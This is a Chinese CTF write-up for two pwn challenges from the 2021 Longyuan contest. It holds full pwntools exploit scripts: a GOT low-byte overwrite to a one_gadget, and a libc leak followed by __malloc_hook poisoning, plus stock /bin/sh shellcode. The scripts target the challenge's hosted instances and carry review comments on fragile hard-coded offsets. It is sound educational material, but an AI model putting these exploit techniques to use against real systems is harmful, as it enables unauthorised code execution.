
陇原抗疫2021 pwn1

PWN1-bbbaby

这个题目就是一个 one_gadget + 覆写 got 表的题。

因为我做题时用了本地环境的 libc，没有打通，还以为是自己脚本的问题；赛后发现题目给的 libc 和我 Ubuntu 16 自带的 libc 小版本不一致。

分析题目

https://blog.restro.cn/wp-content/uploads/2021/11/image.png

在主函数中可以发现：输入 1 会进入输入 data 的地方，输入 0 会进入 some_read()（这里存在一个修改地址的操作）。

https://blog.restro.cn/wp-content/uploads/2021/11/image-1.png

在这里我们发现我们竟然可以修改指定的地址

查看保护机制发现没有开启pie。

于是有了思路,通过改写got表后四位进行爆破,让返回地址到one_gadget地址就可以成功getshell,因为got表的地址是会变化的,所以这里选择one_gadget的时候需要选择0xf开头的onegadget进行使用。

EXP

# _*_ coding:utf-8 _*_
from pwn import *

context.log_level = 'debug'

# Talk to the hosted challenge instance; the local-process variant was
# left commented out by the author.
# p = process("pwn1")
p = remote("node4.buuoj.cn", "26388")


def sa(delim, data):
    """Wait for ``delim``, then send ``data``; both are passed through str()."""
    return p.sendafter(str(delim), str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``data`` plus a newline; both go through str()."""
    return p.sendlineafter(str(delim), str(data))


def it():
    """Hand the connection over to an interactive session."""
    return p.interactive()


def choice(idx):
    """Reply to the "your choice" prompt with ``idx`` rendered as text."""
    answer = '{}'.format(idx)
    sla("your choice", answer)

def exp():
    """Single-shot interaction: pick option 0, send one address, send two
    bytes of content, then hand the session to the user.

    The writeup text describes brute-forcing, but this function performs
    exactly one attempt; there is no retry loop here.
    """
    choice(0)
    # 6295592 == 0x6010a8; passed as an int, sla() applies str() itself.
    sla("address:",(6295592))
    # Two little-endian bytes (p16); the writeup says these replace the low
    # 16 bits of the entry at the address above.
    sa("content:",p16(0x62a4))
    it()
if __name__ == '__main__':
    # Script entry point: run the interaction once.
    exp()

PWN2–magic

待更新

EXP

# _*_ coding:utf-8 _*_
from pwn import *

prog = './Magic'

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# elf = ELF(prog)  # nc 121.36.194.21 49155
# p = process(prog, env={"LD_PRELOAD": "./libc/libc-2.23.so"})

# NOTE(review): this loads the host's own libc-2.23 rather than the libc
# shipped with the challenge (the LD_PRELOAD line above is commented out).
# The first section of this writeup attributes an earlier failure to exactly
# such a libc version mismatch, so the libc.sym offsets used later may not
# match the remote instance -- confirm against the provided libc.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p = remote("node4.buuoj.cn", 25680)  # nc 124.71.130.185 49155
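def debug(addr, PIE=True):
    """Attach gdb to ``p`` with a breakpoint at every address in ``addr``.

    Args:
        addr: iterable of addresses. With ``PIE=True`` each one is treated
            as an offset and added to the base read from ``pmap``; otherwise
            it is used as an absolute address.
        PIE: whether to rebase the addresses on the mapping base.

    The original left the ``os.popen`` handle open; it is now closed via
    ``with`` as soon as the base line has been read.
    """
    if PIE:
        # The second output line of `pmap <pid>` is taken as the base of
        # the first mapping; p.pid is an int, so the command string is fixed.
        with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as fh:
            text_base = int(fh.readlines()[1], 16)
    else:
        # Absolute addresses: no rebasing.
        text_base = 0
    debug_str = ''.join('b *{}\n'.format(hex(text_base + i)) for i in addr)
    gdb.attach(p, debug_str)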

def dbg():
    """Attach gdb to ``p`` with no breakpoint script."""
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
def s(data):
    """Send ``data`` as text without a newline; str() lets ints be passed."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for ``delim``, then send ``data`` as text (no newline)."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send ``data`` as text followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``data`` as text plus a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive until ``delims``; ``drop`` controls whether it is stripped."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the connection over to an interactive session."""
    return p.interactive()


def uu32(data):
    """Unpack up to 4 bytes as a little-endian u32, NUL-padding on the right."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack up to 8 bytes as a little-endian u64, NUL-padding on the right."""
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    """Forward to ``pdbg.bp``; ``pdbg`` is not defined anywhere visible in
    this file, so calling this raises NameError."""
    return pdbg.bp(bkp)


def li(str1, data1):
    """Log ``str1`` and ``data1`` in hex as a success line."""
    return log.success(str1 + '========>' + hex(data1))

    
def dbgc(addr):
    """Attach gdb to ``p``, set a breakpoint at ``addr`` and continue."""
    script = "b*{}\n c".format(hex(addr))
    gdb.attach(p, script)

def lg(s, addr):
    """Print ``s`` right-aligned to 20 columns and ``addr`` as 0x-hex, in
    bold red on black (ANSI), then reset the colour."""
    label = '%20s' % (s,)
    value = '0x%x' % (addr,)
    print('\033[1;31;40m' + label + '-->' + value + '\033[0m')

# Byte strings carried over from the author's template; none of them is
# referenced by any function in the visible part of this file.
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def choice(idx):
    """Answer the menu prompt with ``idx`` as text followed by two newlines."""
    answer = '{}\n\n'.format(idx)
    sla("Input your choice: ", answer)

def add(idx):
    """Menu option 1: send ``idx`` as text padded with three NUL bytes."""
    choice(1)
    payload = str(idx) + '\x00' * 3
    sa("Input the idx", payload)

def delete(idx):
    """Menu option 3: send ``idx`` as text padded with three NUL bytes."""
    choice(3)
    payload = str(idx) + '\x00' * 3
    sa("Input the idx", payload)

# def show(idx):
#   choice(3)
#   sla("Index: ",idx)

def edit(idx, con):
    """Menu option 2: select ``idx`` (text plus three NUL bytes), then send
    ``con`` verbatim at the "Input the Magic" prompt."""
    choice(2)
    payload = str(idx) + '\x00' * 3
    sa("Input the idx", payload)
    sa("Input the Magic", con)



def exp():
    """Drive the remote service once: read back a leaked value after the
    first edit, rebase it with hard-coded constants, then issue a fixed
    sequence of add/delete/edit calls and drop into an interactive session.

    Nothing here is parameterised or retried; every offset below was taken
    from one observed run (see the NOTE comments).
    """
    # debug([0x13aa])
    add(0)
    edit(0,'a'*8)
    # delete(0)
    ru('a'*8)
    # Six bytes follow the 'a'*8 marker; uu64 NUL-pads them to 8 bytes.
    data = uu64(r(6))
    lg('data',data)
    # NOTE(review): both constants come from a single local run, and their
    # difference is what rebases the leak. `addr` is then used as a libc
    # base (it is added to libc.sym offsets), so this only holds while the
    # remote libc has the same layout as the one observed locally.
    addr = data - 0x7fe66967cd98 + 0x7fe6692b8000
    mh = addr + libc.sym['__malloc_hook']
    rh = addr + libc.sym['realloc']
    lg('addr',addr)
    # NOTE(review): this offset is hard-coded rather than derived from the
    # loaded libc ELF; it is tied to the specific libc build.
    one = addr + 0x4527a
#-----------------------------
    delete(0)
    edit(0,p64(mh-0x23))
    add(0)
    add(1)
    lg('rh',rh)
    # 0x13-8 == 11 filler bytes, then two 8-byte little-endian values.
    edit(1,(0x13-8)*'a'+p64(one)+p64(rh+13))
    # dbg()

    add(0)

    it()
if __name__ == '__main__':
    # Script entry point: run the interaction once.
    exp()
